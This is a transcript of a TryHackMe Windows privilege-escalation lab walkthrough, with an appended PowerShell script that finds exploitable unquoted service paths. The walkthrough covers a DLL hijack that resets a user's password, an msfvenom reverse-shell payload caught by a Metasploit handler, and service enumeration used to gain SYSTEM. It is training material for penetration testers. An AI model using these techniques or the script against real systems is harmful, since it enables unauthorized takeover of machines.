The Complete Windows Privilege Escalation Guide | TryHackMe Windows Privesc

Captions
What's going on? Welcome back. Today we will be going over the new pathway released by TryHackMe, Junior Penetration Tester. In this pathway you will go over all of the modules and you will gain the necessary knowledge to, I'm not going to say to become a junior pentester, let me say to have the knowledge required to be a junior penetration tester. So the module, or the pathway, consists of seven modules. In every module you have a couple of rooms, and you have to complete all of the rooms in order to gain the certificate, and of course there are prizes announced from TryHackMe for those who complete as many rooms as possible from the pathway.

So I was curious to know what the rooms contained in every module are, so I went over it. You see, the first thing you have is Intro to Pentesting; you will cover the security and pentesting fundamentals. Next you will go over application pentesting; you will understand more about every kind of vulnerability encountered during web application pentesting, including SQL injection, file inclusion, content discovery, and then you will cover the basics of Burp Suite. As you know, if you want to do pentesting you will definitely need to know how to work with Burp Suite. Next you will go over network security; you will gain the knowledge, extensive knowledge actually, to use Nmap, and later all the different kinds of protocols, and of course active and passive reconnaissance. Then vulnerability research: you'll understand more what a vulnerability is, what kinds of vulnerabilities there are, and you will understand the methodology used to exploit vulnerabilities. Then you've got Metasploit, and lastly privilege escalation for both Windows and Linux. So that's the pathway.

And let me tell you something. If you go to Learn and then, oh yeah, here are the learning paths. So basically you have the fundamentals; you have Offensive Pentesting, PenTest+, Complete Beginner, Pre Security, Cyber Defense and Junior Penetration Tester. So basically you want to know how to know that Junior Penetration Tester is the right pathway for you. So if you have completed Complete Beginner, all right, and if you have completed Pre Security, if you have completed both of these, you can start PenTest+ or you can start Junior Penetration Tester. If you are chasing the knowledge, go after Junior Penetration Tester; if you are chasing the certificates and you want to prepare for your PenTest+, you can take PenTest+. And the last thing you want to do is to take Offensive Pentesting, because Offensive Pentesting is more senior than PenTest+ or Junior Penetration Tester. Some people may argue that those who take OSCP, or have the knowledge required to take OSCP, can be hired as junior pentesters, so it doesn't matter, the naming here. Basically the order follows like that: you start with Complete Beginner, and after Complete Beginner go over Pre Security, after Pre Security go to Web Fundamentals, first you can find the modules, and you have the option to start Junior Penetration Tester or CompTIA PenTest+, and lastly take Offensive Pentesting. If you are not into any of these and you're only into blue teaming, you may start with Complete Beginner, Pre Security, Web Fundamentals, and ignore these guys and take Cyber Defense.

Anyway, I'm not gonna make that long. Let's go back to Junior Penetration Tester and start with the first room. The room that I would like to take today is Windows Privilege Escalation. So this room is interesting and it consists of eight tasks. We will cover all of the tasks in today's video, and of course I will be adding all of the notes to the existing notes of Windows privilege escalation. If you are not subscribed to the channel membership, you can subscribe and take all of the notes; I will be updating most of the notes today, especially the Windows privilege escalation one.

All right, so no more introduction, now let's start with the info gathering. So start the machine, and you have a couple of guide, a couple of commands laid down here to help you do the privilege escalation. So let's jump right into the tasks, and from here I will be starting the machine from the split view here, Windows PrivEsc, enumeration, and from here I will complete the tasks, because there are no credentials in Task 2 that you can use to log into the machine. That's why I will be answering the questions and initializing the machine as you can see on the right.

So once we log into the machine, this is our machine today. Let's go over the tasks and see how we can gain the required knowledge to do privilege escalation. So first: list users on the target system; one of them resembles a flag. So let's suppose that we have gained RDP access to the machine and we want to conduct the initial enumeration that will give us the knowledge to perform privilege escalation. So we launch the command prompt, make the font bigger so my dear fans can see the font, all right. So now to list all of the users we type `net users`; we can see all of the users on the system. So we have Administrator and we have thm17213, so the one that is asked, the one that resembles a flag, is this one.

Next one: what is the OS version of the target machine? So we are asked to find the OS version, which means we need to find the system information, so we type `systeminfo`, and now all of the information about the system is being loaded, so we will be presented with all of the necessary knowledge we need to answer the question. So if you go up we have the host name, Windows Server 2019 Datacenter, OS version, and this is the version, so you copy that and answer with it.

Now, when was security update KB4562562 installed? So here we have to list all of the updates installed on the system in order to find out the one being asked about. So basically let me jump to my notes now and search for updates. So this is the command. What we can do now, we can type the command here and pipe the output to a command called `findstr`, okay, and between the quotes let's copy the number of the update. So we type that and we hit Enter. So now we will list all of the updates and grab the one specified in the question, so here it is: it was installed on 6/10/2020.

What is the state of Windows Defender? Now basically Windows Defender, as you know, runs as a service in Windows, so in order to find out what the state of Windows Defender is we type `sc query` and the name of the service. So basically you may ask what the name of the Windows Defender service is, so I may have to list all of the services in order to understand which one is Windows Defender. So search for services; so here we list all of the services. Let's take that, and now I type `findstr` as well, and inside I type, let's say, "defender", so we search all of the services and grab the ones that have "defender" in their name or somewhere. So we've got Windows Defender Firewall, Windows Defender Advanced Threat Protection, Windows Defender Antivirus Network, and the last one is Windows Defender Antivirus Service; the name is WinDefend. Let's see the status of the service: we type `sc query WinDefend`, and it is stopped.

All right, so why do we need to know all of this information? So basically when you first conduct privilege escalation you want to gain information about the system. Among the useful information is the system version. Why? Because sometimes some versions are vulnerable to certain vulnerabilities, so we can then grab an appropriate exploit to nail that version. We need to know how many users there are and who they are, so we can decide which one of these users we want to gain access to. The security updates: when we list the security updates we can gain an insight on how many updates are installed and how far the system is patched, right. Lastly, it's important of course to know the status of the Windows Defender service when you conduct privilege escalation in Windows, since Windows Defender is an antivirus service, and it's important to know what kind of protections exist on the system before you transfer any exploit or any script. So that is for this task.

Next one, Tools of the Trade. No need to answer that, but actually these are the tools, automated tools that would help you, beside manual methods, in privilege escalation. One of them is winPEAS; most of you know that tool. PowerUp from PowerShell, and of course Windows Exploit Suggester if you work on Linux, and lastly Metasploit. Most of you know these tools, right; you just have to transfer the tool to the machine and run it. So no need to answer any question in here.

Next one, Vulnerable Software. So here we have a couple of questions. So in this task we want to know what software is installed and which of this software could be vulnerable, so we can find an appropriate exploit for that. So in this task: what version of the Fitbit application can you see installed? So here we want to see what the installed programs and software are. So let me go to my notes and search for software, all right, let's take that and list all of the software, but to save time we're going to use `findstr` to filter the output of this command: double quotes and grab the name of the program, it is Fitbit. Now this command may take a while, but you can just navigate through the file system and find the binary of the application: Program Files (x86), Fitbit, right-click on that, Properties, go to Details and you will see the version. But sometimes you don't have access, we don't have RDP access or we don't have GUI access to the system, so you may need to accustom yourself to the command line. Anyway, that's the version, and it's going to come out after a while.

Next one: what kind of vulnerability seems to affect the Fitbit application? So if I go to my machine now and let me do `searchsploit fitbit`, so I have one vulnerability, or one exploit; the vulnerability is unquoted service path. So how do I know that this vulnerability, or this exploit, matches the version of the application? So I grab it with `-m`, `searchsploit -m`; I already did that, so I'm gonna just `ls` and `cat` the exploit. So here are the details: unquoted service path privilege escalation, Fitbit Connect installs a service with an unquoted service path running with SYSTEM privileges. This could potentially allow an unauthorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. So here you see you query first the status of the service, it's auto start, and here you know the unquoted path, so you can create some executable and put it in one of these directories. So basically we know now the vulnerability, so we navigate back to our browser. Okay, so here you see the version popped out, all right. So what kind of vulnerability: unquoted service path.

What version of Foxit Reader is installed on the target system? We do the same; instead here we type Foxit Reader. Again, through the same logic, you go to This PC, Local Disk, Program Files (x86), Foxit Reader, and right-click, Properties, Details, and here you've got the version. The same way, you will see it coming out after a while through the command line. Now why do we need to know the versions of every application installed on the system? Because, as you've seen a while ago, the Fitbit application is installed in a vulnerable version, which means we can find an exploit for that version. That's why you enumerate the software on Windows.

All right, next one: DLL hijacking, a popular method to perform privilege escalation on Windows. Okay, now I'm going to skip right to the questions. Now for this task there is a different machine; you will have the username and you will have the password, and of course you can start the machine. So in this task there's only one question to answer, which is the flag, so I'm going to explain the DLL hijacking process while the machine is being run. So let's go back to my machine and `ls`, so `nano hijackme`, so let's go over the C code here. So this is C code, as you can see, and the purpose of the C code is to execute a command; the command in the C code is `cmd.exe`, change the password of the username jack to password11. So the C code can now be taken and converted into an actual DLL. Now you can of course create a malicious DLL using msfvenom, but this is another way of doing the DLL hijack method. So basically here we create a C file with these lines of code, and of course here we change the command according to our scenario; in the scenario we are asked to change the password of the user jack, so we put the command as is here. So the next thing is we compile the C code into a DLL file. Since we are working on Linux and the DLL file will be transferred to a Windows system, right, we need to cross-compile. To cross-compile, the command is this one: so we use a tool called mingw32 to cross-compile the C code into a DLL that would work on Windows. So I have already done that; this is a DLL. Once you execute this command you will have the output as a file called hijackme.dll.

Now we are ready to perform the DLL hijack attack, but first, before transferring the DLL to the machine, we have to understand where to inject this payload. Let's first log into the machine. This is Remmina, by the way; I expect you to know how to use this, okay. The IP of the machine, also connect, and I'm gonna check-mark the shared folder since I want to transfer files, file system, connect, yes. So make this bigger, and this is our target machine for this task, okay. Now we already have a DLL payload, so where to put that payload? First we have to find a service, all right, we have to find a service that is looking for a missing DLL, all right, so we put our payload as the missing DLL and then the service will use our DLL. So first let's enumerate the services and find a service that is looking for a missing DLL. So services, let me search for services, and let's make the font bigger. So here are all the exes. Sometimes you would have to look through the services first to find any service that is using a DLL. So for me it appears there is no, by the way, I'm just making this longer, why I'm doing this, let's download a program called Process Monitor; through Process Monitor we can just do whatever we want. Let's see if I have it on my machine, process, I have Process Hacker, so let me download Process Monitor on my machine. Technically you're gonna click on that, download this to Downloads, okay, and then we're gonna extract here, extract here, okay, 64. I'm gonna grab this one, copy it to the Kali machine, so we're going to have to do that, minimize this one like that, and place, or paste, Process Monitor here. Now we get back to the machine; since we've got sharing active we're gonna go to This PC and then to my Kali machine, go to home, yeah, kinda slow, I know that, so go to Desktop, I'm gonna go to TryHackMe, and from here I can safely copy the executable file, all right then. So let's execute this, agree, so as you can see Windows Defender has found, ah, so we have to have admin privileges, okay, so we can't do that, we can't execute Process Monitor on the machine.

So basically in this room, since we cannot run Process Monitor for some reason, because we don't have admin privileges, basically the owner of the room is telling you that you can use Process Monitor, and they have already located a path for you to place your DLL. So basically in a regular scenario you run Process Monitor and you look for a service or a path that is looking for a DLL which is not found. In this scenario the path is, what happened, no permission to access this connection, okay, I think we have to go to our machine, all right. So the path is in the temp directory. So if you go to temp now, there is a service called, let me just see if this is running, search for DLL, so basically this is the service that they have located for you: dllsvc, DLL Hijack Service. Normally in a real scenario you have to locate the service yourself and find a service that is looking for a DLL which is either missing or you have access to overwrite it, right. So basically in this scenario they have already told you this is the service and you have to find out how to do DLL hijacking on the service. So this service is using the temporary path and it's looking for a DLL called hijackme.dll in this path, or in the temp directory, but as you can see the temp directory is empty. So basically we have to take advantage of that and create one DLL, place it in that temp directory, restart the service and see if the command we created in the DLL file will be executed.

So we go back to Kali, go to home, Desktop, TryHackMe, and then take this one, copy that, go to C:\Temp and place it here. Now go back to the command line and see the status of the service: `sc query dllsvc`, the service is stopped, so we start it. Now before doing that let's make sure the DLL has been transferred, Enter, and now we start the service. I think I made a mistake, it is query, okay, `start dllsvc`, now it is being started. So let's wait for one minute, and now we will try to log in with the other user, which is jack. So let's minimize that one and initialize a new connection, take the IP address, username is jack and the password we used was nano hijack, let's see inside the file, nope, this is the password that we chose for this user, auto connect. Now let's again query the status of the service, see if it has been started, dllsvc, start pending, let's make sure, so it is starting, which means it's going to run. Let me try to log in now with the username we have just changed the password for, connect, and successfully we are logged in as jack, which means the DLL hijack has been successfully executed. So now the question is asking: log in with jack's account, what is the content of the flag.dll text file? So find the flag file, there is one here in the recent files, open it, and this is your flag. Okay, so that is for this task, DLL hijacking.

So next one is unquoted service path, which is also another method for conducting privilege escalation on Windows. So we close this machine, we don't need this machine anymore, yes, keep Remmina open. So unquoted service path: I'm going to explain the process. Let's now log into a new machine, terminate this one and start this one, all right. So we take the IP address, establish a new connection, password1, and the username is user, auto connect, share my file system and connect, accept the certificate, and now we are connecting. So there is an unquoted service path vulnerability in this machine; we have to find it and we have to find out what the service is that is vulnerable to this vulnerability. So basically maximize the view and open your command prompt, cmd, so Properties, font, okay. So in order to find out which service has an unquoted service path we have to enumerate the services, right, so we list all of the services, display name, the path name, and we find out which one uses an unquoted service path, all right. So for all of the services that use executables in System32 or in the Windows directory, we can't have access to these, so you have to find the non-standard ones. One way to find that out is, let's see here on my notes if there is a way to, non-standard services, okay, this is one, this one is good. So these are the non-standard services; as you can see we have Amazon, only Amazon, two. Now we have to remove the auto from here, okay, findstr, let's remove the auto because we don't want, it doesn't necessarily have to be an auto-started service. And yeah, let's see now. So now the list has been expanded and we've got Program Files, in SQL, registry, you see it is quoted, this is the path which is quoted, next one is also quoted, this one is also quoted, quoted, and the only one which is not quoted is this one; the path is in C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe and the name of the service is this one.

So the steps to conduct the privilege escalation on this vulnerability are to first know what the status of the service is, so `sc query`, and it is stopped as you can see. Now let's get more details about the service, `sc` and now unquoted, so I guess I made a mistake in the command, let's go up and see where the mistake is. So `sc server command service-name`, so these are the commands, query, queryex, I want to see the full path of the executable the service is using, so I'm gonna have to retype, but it doesn't display the full information about this. Let's go up and find the proper command for that, can you see, yeah it's `qc`. So basically here instead of query I'm gonna type `qc`, and now I can see the full executable path, right, as you can see it's not quoted. Now the next step is to check if one of the directories in the path here can be, or is, writable to the current user. So we need to know if we have permissions to write to one of these directories, either Program Files, either this one, Common Files, so that we know where to place the payload and what to name it. So for that I'm going to navigate to `cd Desktop`, okay, let's move this to the right, the system cannot find the path specified, okay, `cd` or `dir`, the machine is lagging, so `cd` now to see the Desktop. So I have accesschk; I will check on this path if I can write on this path, Program Files. So what I'm going to use now: `.\accesschk /accepteula -uwq` and then between double quotes we type the path name. No matching objects found, accesschk64, so accept the EULA, and I guess we forgot the directory again, we've got this error, C:\Program Files, yeah, so actually I forgot the backslash here, one more time, okay. So basically on Program Files only Administrators and SYSTEM can write on this path, so we cannot put our payload here. Let's go up and select the next path, which is C:\Program Files\Unquoted Path Service. So the same command stands, and of course we replace the path here with ours, and as you can see we have Users; among the Users is the current one, who can write on this path, which means now we can create our payload and place it on that path.

So now what's the name of the payload? So basically the name of the payload should be, since we replaced the payload here, right, the name should be common.exe, so starting from this path, right, we can write on these directories, which means we will create a payload, name it common.exe and place it in this directory, oh sorry, in this directory. So now let's switch to the Kali machine, and yeah, it's the Kali machine actually, let's minimize this one and go back to the terminal. Let me retrieve the command: so basically we use msfvenom, right, and the payload is windows/x64/shell_reverse_tcp, define your LHOST, define the listening port, and the format of the file is exe, and then the output name, which is common.exe. Now since I have already done this, the file, or the executable, is ready. Next we launch the listener, this is the handler, all right, I'm gonna launch a new tab here and type, oh okay, so the listener should be created in msfconsole. So launch msfconsole, `use multi/handler`, I'm going to show you the options I created, so you select the payload windows/x64/shell_reverse_tcp, your LHOST, your LPORT, and run the listener, wait for the incoming connections, switch back to the target machine, and now we copy the file: home, select Desktop, TryHackMe, and go to, so my file is somewhere here, where is common, come on, come on, oh my god, where is the file, let me check back. So it's supposed to be here under TryHackMe, okay, let me create the file then; it seems that I deleted the file without me knowing. Okay, check back here, refresh, and now I should see the file I have just created, common. Now I copy the file and we go to C:\Program Files\Unquoted Path Service and we place the file here. Now before going back to your listener and checking if the exploit worked, let's first go to the command line and start the service, right, we have to start our service. Go up, let's find out where the service name is, I know this is overwhelming but that's how it works, okay. Now `sc query`, so now it's stopped, let's start the service, `sc start` and put the service name, so now the service should be starting. As you can see there is one new session open on my machine, `whoami`, and we are NT AUTHORITY\SYSTEM. I have successfully conducted privilege escalation.

The answers: what is the full unquoted path of the service? We explained this, this is the path. Go through some folders in the unquoted service binary path; in which folder does the user have read and write privileges? We saw it was Program Files\Unquoted Path Service. What would be the name of the executable? It was common. Now find the flag: obtain administrator privileges on the target, what is the content of the flag? Since we don't know what the flag file is, let's search for that file. So we type, let's go back, `cd` back, the full structure of the Windows system, type `dir`, the file name, `/s`, and now it will search for the file. Once we locate the file we will extract the flag and we are done with the room. Now what else do we have to do in this room? Basically for the answers, once you answer the questions here you are done, but there is additional stuff to read if you are curious to know more about the Windows privilege escalation methods. No answer is needed here, and here also no answer is needed, but you can just read through these. If you are subscribed to my channel you will find all of these notes summarized and briefed in the notes. Okay, let me check on the file, so we have found the file; it is in C:\Users\cora\Documents, nope, anyway, navigate to that path and read the content of the flag, and you will find it is thm6 at the end of the line. All right, so that was for today and see you in the next video.
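The unquoted service path check in the video is done by hand: eyeballing `wmic service` output for a path without quotes, guessing the hijack name (common.exe) from the first space, then testing each directory with accesschk. The script below is an added example written for this page by the editor; it is not code from the video, from Motasem Hamdan's notes, or from the TryHackMe room. It automates the same three steps for every service on the host, not only the planted one: it selects services whose binary path is unquoted and contains a space, derives the executable names Windows would try before the real one (`C:\Program.exe`, `C:\Program Files\Unquoted.exe`, and so on), and reports which of those the current user can actually create. It assumes Windows PowerShell 5.1 or later on the target and that writing and deleting an empty probe file in each candidate directory is acceptable for your engagement; the function and property names are the editor's own.

```powershell
# Added example (editor's, not from the video or the TryHackMe room).
# Finds services whose binary path is unquoted and contains a space,
# lists the executables Windows would try before the real one
# (C:\Program.exe, C:\Program Files\Unquoted.exe, ...), and reports
# which of those the current user could actually drop.

function Get-UnquotedPathCandidate {
    # 'C:\Program Files\Unquoted Path Service\Common Files\svc.exe' ->
    #   C:\Program.exe
    #   C:\Program Files\Unquoted.exe
    #   C:\Program Files\Unquoted Path.exe
    #   C:\Program Files\Unquoted Path Service\Common.exe
    param([Parameter(Mandatory)][string]$ExePath)
    $parts = $ExePath -split ' '
    for ($i = 1; $i -lt $parts.Count; $i++) {
        ($parts[0..($i - 1)] -join ' ') + '.exe'
    }
}

function Test-DirectoryWritable {
    # Ground truth instead of ACL parsing: try to create and delete an empty
    # probe file. This touches the disk; use accesschk.exe -uwdq on the
    # directory instead if you must stay read-only.
    param([Parameter(Mandatory)][string]$Path)
    if (-not (Test-Path -LiteralPath $Path -PathType Container)) { return $false }
    $probe = Join-Path -Path $Path -ChildPath ('.' + [guid]::NewGuid().ToString('N'))
    try {
        [System.IO.File]::WriteAllText($probe, '')
        Remove-Item -LiteralPath $probe -Force
        return $true
    } catch {
        return $false
    }
}

function Find-UnquotedServicePath {
    Get-CimInstance -ClassName Win32_Service |
        Where-Object {
            $_.PathName -and
            $_.PathName -notmatch '^\s*"' -and                  # quoted: not exploitable this way
            $_.PathName -notmatch '^\s*[A-Za-z]:\\Windows\\'    # skip the OS tree (not user-writable)
        } |
        ForEach-Object {
            $svc = $_
            # Keep only the executable, dropping any arguments after it
            $exe = if ($svc.PathName -match '^(.*?\.exe)') { $Matches[1].Trim() } else { $svc.PathName.Trim() }
            if ($exe -notmatch ' ') { return }   # no space in the path: nothing to hijack
            foreach ($candidate in Get-UnquotedPathCandidate -ExePath $exe) {
                [PSCustomObject]@{
                    Service    = $svc.Name
                    StartMode  = $svc.StartMode
                    RunsAs     = $svc.StartName
                    BinaryPath = $exe
                    DropAs     = $candidate
                    Writable   = Test-DirectoryWritable -Path (Split-Path -Path $candidate -Parent)
                }
            }
        }
}

# Only the rows you can act on. A service that runs as LocalSystem with a
# writable candidate directory is exactly the room's scenario.
Find-UnquotedServicePath | Where-Object { $_.Writable } | Format-Table -AutoSize
```

Run it as the low-privilege user on the target. A row with `Writable` true tells you the file name to give your msfvenom payload (`DropAs`) and the service to restart afterwards, as the video does with `sc start`; `RunsAs` tells you what you get. Two caveats the video glosses over: a writable directory is only useful if you can also start the service (or it is Auto start and you can wait for a reboot), and the probe-file approach reports the truth for your token but leaves a short-lived file on disk, which defenders can notice.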
Info
Channel: Motasem Hamdan
Views: 24,455
Keywords: windows, pentesting, arabaraar
Id: VlRox0GmOzU
Length: 41min 23sec (2483 seconds)
Published: Fri Oct 22 2021